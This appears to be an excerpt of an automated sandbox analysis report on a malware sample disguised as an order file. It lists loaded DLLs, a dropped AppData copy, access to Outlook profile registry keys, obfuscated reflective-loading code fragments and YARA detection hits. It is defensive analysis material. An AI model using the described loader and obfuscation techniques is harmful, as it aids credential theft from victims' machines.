                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Cbgoomiexw.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\GEFA-Order 232343-68983689.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: GEFA-Order 232343-68983689.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.000000000314C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1716960379.000000000342A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1736166624.0000000006F60000.00000004.08000000.00040000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.000000000440A000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004261000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000003.00000002.1881514343.000000000281A000.00000004.00000800.00020000.00000000.sdmp, Cbgoomiexw.exe, 00000007.00000002.1965310119.000000000314C000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: GEFA-Order 232343-68983689.exe, 00000000.00000002.1727745948.0000000004531000.00000004.00000800.00020000.00000000.sdmp, GEFA-Order 232343-68983689.exe, 00000000.00000002.1735785966.0000000006E80000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: 0.2.GEFA-Order 232343-68983689.exe.4269550.2.raw.unpack, zD4eAqejnbD8YI9R4OZ.cs.Net Code: Type.GetTypeFromHandle(Sx15xO0TOnhA2u0ZdoK.JAfPsLRys8(16777265)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Sx15xO0TOnhA2u0ZdoK.JAfPsLRys8(16777259)),Type.GetTypeFromHandle(Sx15xO0TOnhA2u0ZdoK.JAfPsLRys8(16777263))})
                    Source: GEFA-Order 232343-68983689.exe, Zobwfhfng.cs.Net Code: Octjwv System.AppDomain.Load(byte[])
                    Source: Cbgoomiexw.exe.0.dr, Zobwfhfng.cs.Net Code: Octjwv System.AppDomain.Load(byte[])
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.6f60000.11.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.GEFA-Order 232343-68983689.exe.3475368.1.raw.unpack, Zobwfhfng.cs.Net Code: Octjwv System.AppDomain.Load(byte[])
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.440a100.7.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.GEFA-Order 232343-68983689.exe.43ba0e0.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: Yara matchFile source: 0.2.GEFA-Order 232343-68983689.exe.6e10000.9.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.1965310119.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1735614547.0000000006E10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1881514343.000000000269A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1716960379.00000000032AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
